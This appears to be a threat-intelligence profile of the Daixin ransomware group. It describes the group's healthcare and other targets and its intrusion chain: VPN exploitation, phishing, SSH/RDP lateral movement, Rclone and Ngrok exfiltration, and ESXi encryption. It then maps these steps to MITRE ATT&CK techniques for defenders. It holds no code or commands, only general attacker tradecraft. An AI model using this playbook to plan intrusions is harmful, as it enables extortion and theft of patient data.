|
| |
| |
| |
| |
| Data Theft
Financial Gain |
| |
Overview
The Daixin ransomware group is a financially motivated cybercrime organization that has rapidly emerged as a significant threat since its inception in June 2022. Known for its sophisticated tactics and targeted attacks, Daixin has predominantly focused on sectors with critical operational dependencies, most notably the US Healthcare and Public Health (HPH) sector. This group’s activities have led to the compromise of electronic health records (EHRs), personally identifiable information (PII), patient health information (PHI), and the disruption of essential healthcare services. By leveraging double extortion techniques, Daixin encrypts critical files while threatening to release stolen data, placing immense pressure on victims to comply with their demands.
Although healthcare has been a primary target, Daixin has demonstrated its ability to attack diverse industries. Notable incidents include the 2022 breach of Malaysia’s AirAsia Group, which exposed the personal data of over five million passengers and employees, and the 2023 compromise of B&G Foods, a multibillion-dollar conglomerate. In both cases, the victims refused to pay the ransom, prompting Daixin to publicly release sensitive data on its leak site. These attacks underscore the group’s capacity to cause widespread operational and reputational harm.
Daixin’s technical sophistication is another hallmark of its operations. The group typically gains initial access to networks through vulnerabilities in virtual private network (VPN) servers or by exploiting weak credentials obtained via phishing campaigns. Once inside, Daixin uses advanced lateral movement techniques to infiltrate systems and exfiltrate sensitive data. Its encryption methods, based on the Babuk Locker strain, target critical systems, including VMware ESXi servers, rendering virtual machines and databases inoperable. These multi-layered attack strategies make Daixin a formidable adversary for cybersecurity teams.
Common targets
Health Care and Social Assistance
Transportation and Warehousing – United States
Malaysia
Attack Vectors
Software Vulnerabilities
Remote Desktop Protocol (RDP)
How they operate
Initial access is a cornerstone of Daixin’s strategy. The group predominantly targets virtual private network (VPN) servers, exploiting misconfigurations and vulnerabilities to penetrate enterprise defenses. In cases where software flaws are unavailable, they turn to phishing campaigns aimed at extracting login credentials from unsuspecting employees. By compromising VPN access points, Daixin bypasses perimeter defenses and establishes a foothold in the victim’s environment, from which they stage their multi-pronged attack.
Once inside the network, Daixin focuses on reconnaissance and lateral movement. The group conducts a thorough exploration of the compromised environment, using advanced tools to harvest credentials and map the internal network. Stolen credentials often facilitate lateral movement via Secure Shell (SSH) and Remote Desktop Protocol (RDP), enabling Daixin to navigate through critical systems. Their choice of utilities, including Rclone for cloud storage management and Ngrok for establishing reverse proxies, underscores their technical acumen in securely exfiltrating data while avoiding detection.
Data encryption and exfiltration represent the final stages of Daixin’s attack lifecycle. Leveraging a ransomware module based on the Babuk Locker strain, they encrypt files using ChaCha8 algorithms, rendering them inaccessible to victims. For larger files, Daixin employs segmented encryption techniques to optimize performance while ensuring file integrity is irreversibly compromised. They also target VMware ESXi servers, resetting administrative credentials and encrypting virtual machine files, further crippling victim operations. Stolen data is then used as leverage in double-extortion schemes, where organizations are pressured to pay ransom demands under the threat of public exposure.
The Daixin ransomware group exemplifies the evolving complexity of modern ransomware campaigns. Their blend of technical sophistication and psychological manipulation poses significant challenges to organizations and cybersecurity teams. By understanding their operational methods, enterprises can better prepare to defend against this persistent threat, emphasizing proactive measures such as patch management, credential security, and network segmentation.
MITRE Tactics and Techniques
1. Initial Access
Technique: Exploit Public-Facing Application (T1190)
Daixin Team exploits vulnerabilities in virtual private network (VPN) servers to gain initial access to target networks.
Technique: Phishing (T1566)
They use phishing campaigns to harvest VPN credentials from employees of targeted organizations.
2. Execution
Technique: Command and Scripting Interpreter (T1059)
The group uses scripts and commands for deploying ransomware and lateral movement.
3. Persistence
Technique: Valid Accounts (T1078)
Stolen credentials allow Daixin Team to maintain access to compromised networks.
4. Privilege Escalation
Technique: Valid Accounts (T1078)
Leveraging stolen credentials with elevated privileges for further actions within the network.
5. Defense Evasion
Technique: Obfuscated Files or Information (T1027)
The group employs obfuscation techniques to bypass detection mechanisms.
Technique: Indicator Removal on Host (T1070)
They delete logs or other traces of their activities to avoid detection.
6. Credential Access
Technique: Credential Dumping (T1003)
Daixin extracts credentials stored within systems to facilitate lateral movement.
7. Discovery
Technique: System Network Configuration Discovery (T1016)
Conducts reconnaissance to map out the target network and identify key systems.
Technique: Remote System Discovery (T1018)
Identifies accessible systems for lateral movement.
8. Lateral Movement
Technique: Remote Services (T1021)
Uses protocols like SSH and RDP for lateral movement within the network.
9. Collection
Technique: Data from Information Repositories (T1213)
Targets databases and shared drives containing sensitive information.
10. Exfiltration
Technique: Exfiltration Over Alternative Protocol (T1048)
Utilizes tools like Rclone and Ngrok to transfer stolen data to external servers.
11. Impact
Technique: Data Encrypted for Impact (T1486)
Deploys ransomware to encrypt critical files and systems, including VMware ESXi servers.
Technique: Service Stop (T1489)
Terminates services to facilitate encryption of files in use.
